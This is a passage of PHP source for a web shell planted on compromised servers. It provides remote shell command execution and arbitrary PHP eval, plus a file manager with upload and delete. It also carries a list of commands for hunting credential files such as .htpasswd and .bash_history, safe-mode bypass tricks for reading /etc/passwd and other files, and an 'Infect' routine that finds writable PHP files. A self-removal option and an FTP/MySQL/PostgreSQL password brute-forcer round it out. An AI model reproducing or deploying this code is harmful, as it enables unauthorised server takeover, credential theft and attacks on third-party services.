\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\t/* (С) 12.2015 mitryz */\r\n\t\tcase \'frame\':\r\n\t\t\t$frameSrc = substr(htmlspecialchars($GLOBALS[\'cwd\']), strlen(htmlspecialchars($_SERVER[\'DOCUMENT_ROOT\'])));\r\n\t\t\tif ($frameSrc[0] != \'/\')\r\n\t\t\t\t$frameSrc = \'/\' . $frameSrc;\r\n\t\t\tif ($frameSrc[strlen($frameSrc) - 1] != \'/\')\r\n\t\t\t\t$frameSrc = $frameSrc . \'/\';\r\n\t\t\t$frameSrc = $frameSrc . htmlspecialchars($_POST[\'p1\']);\r\n\t\t\techo \'\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\nif($os == \'win\')\r\n\t$aliases = array(\r\n\t\t"List Directory" => "dir",\r\n \t"Find index.php in current dir" => "dir /s /w /b index.php",\r\n \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n \t"Show active connections" => "netstat -an",\r\n \t"Show running services" => "net start",\r\n \t"User accounts" => "net user",\r\n \t"Show computers" => "net view",\r\n\t\t"ARP Table" => "arp -a",\r\n\t\t"IP Configuration" => "ipconfig /all"\r\n\t);\r\nelse\r\n\t$aliases = array(\r\n \t\t"List dir" => "ls -lha",\r\n\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\r\n \t\t"show opened ports" => "netstat -an | grep -i listen",\r\n "process status" => "ps aux",\r\n\t\t"Find" => "",\r\n \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\r\n \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\r\n \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\r\n \t\t"find config* files" => "find / -type f -name \\"config*\\"",\r\n \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n \t\t"find all writable folders and files" => "find / -perm -2 -ls",\r\n \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\r\n \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\r\n \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n\t\t"Locate" => "",\r\n \t\t"locate httpd.conf files" => "locate httpd.conf",\r\n\t\t"locate vhosts.conf files" => "locate vhosts.conf",\r\n\t\t"locate proftpd.conf files" => "locate proftpd.conf",\r\n\t\t"locate psybnc.conf files" => "locate psybnc.conf",\r\n\t\t"locate my.conf files" => "locate my.conf",\r\n\t\t"locate admin.php files" =>"locate admin.php",\r\n\t\t"locate cfg.php files" => "locate cfg.php",\r\n\t\t"locate conf.php files" => "locate conf.php",\r\n\t\t"locate config.dat files" => "locate config.dat",\r\n\t\t"locate config.php files" => "locate config.php",\r\n\t\t"locate config.inc files" => "locate config.inc",\r\n\t\t"locate config.inc.php" => "locate config.inc.php",\r\n\t\t"locate config.default.php files" => "locate config.default.php",\r\n\t\t"locate config* files " => "locate config",\r\n\t\t"locate .conf files"=>"locate \'.conf\'",\r\n\t\t"locate .pwd files" => "locate \'.pwd\'",\r\n\t\t"locate .sql files" => "locate \'.sql\'",\r\n\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\r\n\t\t"locate .bash_history files" => "locate \'.bash_history\'",\r\n\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\r\n\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n\t\t"locate backup files" => "locate backup",\r\n\t\t"locate dump files" => "locate dump",\r\n\t\t"locate priv files" => "locate priv"\r\n\t);\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n echo "";\r\n\techo \'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
\';\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\nfunction actionPhp() {\r\n\tif( isset($_POST[\'ajax\']) ) {\r\n\t\t$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\t$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit; \r\n\t}\r\n\thardHeader();\r\n\tif( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) {\r\n\t\techo \'

PHP info

\';\r\n\t\tob_start();\r\n\t\tphpinfo();\r\n\t\t$tmp = ob_get_clean();\r\n\t\t$tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n\t\t$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n\t\t$tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n\t\techo $tmp;\r\n\t\techo \'

\';\r\n\t}\r\n\tif(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\t$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n\t\techo \'

Execution PHP-code

\';\r\n\techo \' send using AJAX
\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\techo htmlspecialchars(ob_get_clean());\r\n\t}\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n \r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif ( is_array($_FILES[\'f\'][\'tmp_name\']) ) {\r\n\t\t\t\t\tforeach ( $_FILES[\'f\'][\'tmp_name\'] as $i => $tmpName ) {\r\n if(!@move_uploaded_file($tmpName, $_FILES[\'f\'][\'name\'][$i])) {\r\n echo "Can\'t upload file!";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($microsoft = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$microsoft = $path.$microsoft;\r\n\t\t\t\t\t\tif ( (basename($microsoft) == "..") || (basename($microsoft) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($microsoft);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($microsoft);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($microsoft);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n ex(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\tprototype(\'act\', $_POST[\'p1\']);\r\n\t\t\t\t\tprototype(\'f\', serialize(@$_POST[\'f\']));\r\n\t\t\t\t\tprototype(\'c\', @$_POST[\'c\']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n hardHeader();\r\n\techo \'

File manager

\';\r\n\t$dirContent = hardScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';hardFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "\r\n\r\n";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => viewPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&&($dirContent[$i] != "."))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction cmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "cmp");\r\n\tusort($dirs, "cmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\'\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\']\r\n\t\t\t.\'R T\'.(($f[\'type\']==\'file\')?\' F E D\':\'\').\'
\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo " file name:  ";\r\n echo "
";\r\n\thardFooter();\r\n}\r\nfunction actionStringTools() {\r\n\tif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n\tif(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i \'base64_encode\',\r\n\t\t\'Base64 decode\' => \'base64_decode\',\r\n\t\t\'Url encode\' => \'urlencode\',\r\n\t\t\'Url decode\' => \'urldecode\',\r\n\t\t\'Full urlencode\' => \'full_urlencode\',\r\n\t\t\'md5 hash\' => \'md5\',\r\n\t\t\'sha1 hash\' => \'sha1\',\r\n\t\t\'crypt\' => \'crypt\',\r\n\t\t\'CRC32\' => \'crc32\',\r\n\t\t\'ASCII to HEX\' => \'ascii2hex\',\r\n\t\t\'HEX to ASCII\' => \'hex2ascii\',\r\n\t\t\'HEX to DEC\' => \'hexdec\',\r\n\t\t\'HEX to BIN\' => \'hex2bin\',\r\n\t\t\'DEC to HEX\' => \'dechex\',\r\n\t\t\'DEC to BIN\' => \'decbin\',\r\n\t\t\'BIN to HEX\' => \'binhex\',\r\n\t\t\'BIN to DEC\' => \'bindec\',\r\n\t\t\'String to lower case\' => \'strtolower\',\r\n\t\t\'String to upper case\' => \'strtoupper\',\r\n\t\t\'Htmlspecialchars\' => \'htmlspecialchars\',\r\n\t\t\'String length\' => \'strlen\',\r\n\t);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))\r\n\t\t\techo $_POST[\'p1\']($_POST[\'p2\']);\r\n\t\t$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n\techo \'

String conversions

\';\r\n\techo "
send using AJAX
";\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n\t}\r\n\techo"

Search files:

\r\n\t\t
\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t
Text:
Path:
Name:
";\r\n\tfunction hardRecursiveGlob($path) {\r\n\t\tif(substr($path, -1) != \'/\')\r\n\t\t\t$path.=\'/\';\r\n\t\t$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n\t\tif(is_array($paths)&&@count($paths)) {\r\n\t\t\tforeach($paths as $microsoft) {\r\n\t\t\t\tif(@is_dir($microsoft)){\r\n\t\t\t\t\tif($path!=$microsoft)\r\n\t\t\t\t\t\thardRecursiveGlob($microsoft);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(empty($_POST[\'p2\']) || @strpos(file_get_contents($microsoft), $_POST[\'p2\'])!==false)\r\n\t\t\t\t\t\techo "".htmlspecialchars($microsoft)."
";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(@$_POST[\'p3\'])\r\n\t\thardRecursiveGlob($_POST[\'c\']);\r\n\techo "

Search for hash:

\r\n\t\t
\r\n\t\t\t
\r\n \r\n\t\t\t
\r\n\t\t\t
\r\n
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t
";\r\n\thardFooter();\r\n}\r\nfunction actionSafeMode() {\r\n\t$temp=\'\';\r\n\tob_start();\r\n\tswitch($_POST[\'p1\']) {\r\n\t\tcase 1:\r\n\t\t\t$temp=@tempnam($test, \'cx\');\r\n\t\t\tif(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){\r\n\t\t\t\techo @file_get_contents($temp);\r\n\t\t\t\tunlink($temp);\r\n\t\t\t} else\r\n\t\t\t\techo \'Sorry... Can\\\'t open file\';\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t$files = glob($_POST[\'p2\'].\'*\');\r\n\t\t\tif( is_array($files) )\r\n\t\t\t\tforeach ($files as $filename)\r\n\t\t\t\t\techo $filename."\\n";\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t$ch = curl_init("file://".$_POST[\'p2\']."\\x00".SELF_PATH);\r\n\t\t\tcurl_exec($ch);\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tini_restore("safe_mode");\r\n\t\t\tini_restore("open_basedir");\r\n\t\t\tinclude($_POST[\'p2\']);\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tfor(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n\t\t\t\t$uid = @posix_getpwuid($_POST[\'p2\']);\r\n\t\t\t\tif ($uid)\r\n\t\t\t\t\techo join(\':\',$uid)."\\n";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase 6:\r\n\t\t\tif(!function_exists(\'imap_open\'))break;\r\n\t\t\t$stream = imap_open($_POST[\'p2\'], "", "");\r\n\t\t\tif ($stream == FALSE)\r\n\t\t\t\tbreak;\r\n\t\t\techo imap_body($stream, 1);\r\n\t\t\timap_close($stream);\r\n\t\t\tbreak;\r\n\t}\r\n\t$temp = ob_get_clean();\r\n\thardHeader();\r\n\techo \'

Safe mode bypass

\';\r\n\techo \'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
\';\r\n\tif($temp)\r\n\t\techo \'
\'.$temp.\'
\';\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\nfunction actionLogout() {\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n\tdie(\'bye!\');\r\n}\r\nfunction actionSelfRemove() {\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n hardHeader();\r\n\techo \'

Suicide

Really want to remove the shell?
Yes
\';\r\n\thardFooter();\r\n}\r\nfunction actionInfect() {\r\n\thardHeader();\r\n\techo \'

Infect

\';\r\n\tif($_POST[\'p1\'] == \'infect\') {\r\n\t\t$target=$_SERVER[\'DOCUMENT_ROOT\'];\r\n\t\t\tfunction ListFiles($dir) {\r\n\t\t\t\tif($dh = opendir($dir)) {\r\n\t\t\t\t\t$files = Array();\r\n\t\t\t\t\t$inner_files = Array();\r\n\t\t\t\t\twhile($file = readdir($dh)) {\r\n\t\t\t\t\t\tif($file != "." && $file != "..") {\r\n\t\t\t\t\t\t\tif(is_dir($dir . "/" . $file)) {\r\n\t\t\t\t\t\t\t\t$inner_files = ListFiles($dir . "/" . $file);\r\n\t\t\t\t\t\t\t\tif(is_array($inner_files)) $files = array_merge($files, $inner_files); \r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tarray_push($files, $dir . "/" . $file);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\treturn $files;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tforeach (ListFiles($target) as $key=>$file){\r\n\t\t\t\t$nFile = substr($file, -4, 4);\r\n\t\t\t\tif($nFile == ".php" ){\r\n\t\t\t\t\tif(($file<>$_SERVER[\'DOCUMENT_ROOT\'].$_SERVER[\'PHP_SELF\'])&&(is_writeable($file))){\r\n\t\t\t\t\t\techo "$file
";\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo "$i";\r\n\t\t}else{\r\n\t\t\techo "
";\r\n\t\t\techo \'Really want to infect the server? Yes
\';\r\n\t\t}\r\n\thardFooter();\r\n}\r\nfunction actionBruteforce() {\r\n\thardHeader();\r\n\tif( isset($_POST[\'proto\']) ) {\r\n\t\techo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\';\r\n\t\tif( $_POST[\'proto\'] == \'ftp\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$fp = @ftp_connect($ip, $port?$port:21);\r\n\t\t\t\tif(!$fp) return false;\r\n\t\t\t\t$res = @ftp_login($fp, $login, $pass);\r\n\t\t\t\t@ftp_close($fp);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$res = @mysqli_connect($ip.\':\'.($port?$port:3306), $login, $pass);\r\n\t\t\t\t@mysqli_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\r\n\t\t\t\t$res = @pg_connect($str);\r\n\t\t\t\t@pg_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$success = 0;\r\n\t\t$attempts = 0;\r\n\t\t$server = explode(":", $_POST[\'server\']);\r\n\t\tif($_POST[\'type\'] == 1) {\r\n\t\t\t$temp = @file(\'/etc/passwd\');\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = explode(":", $line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
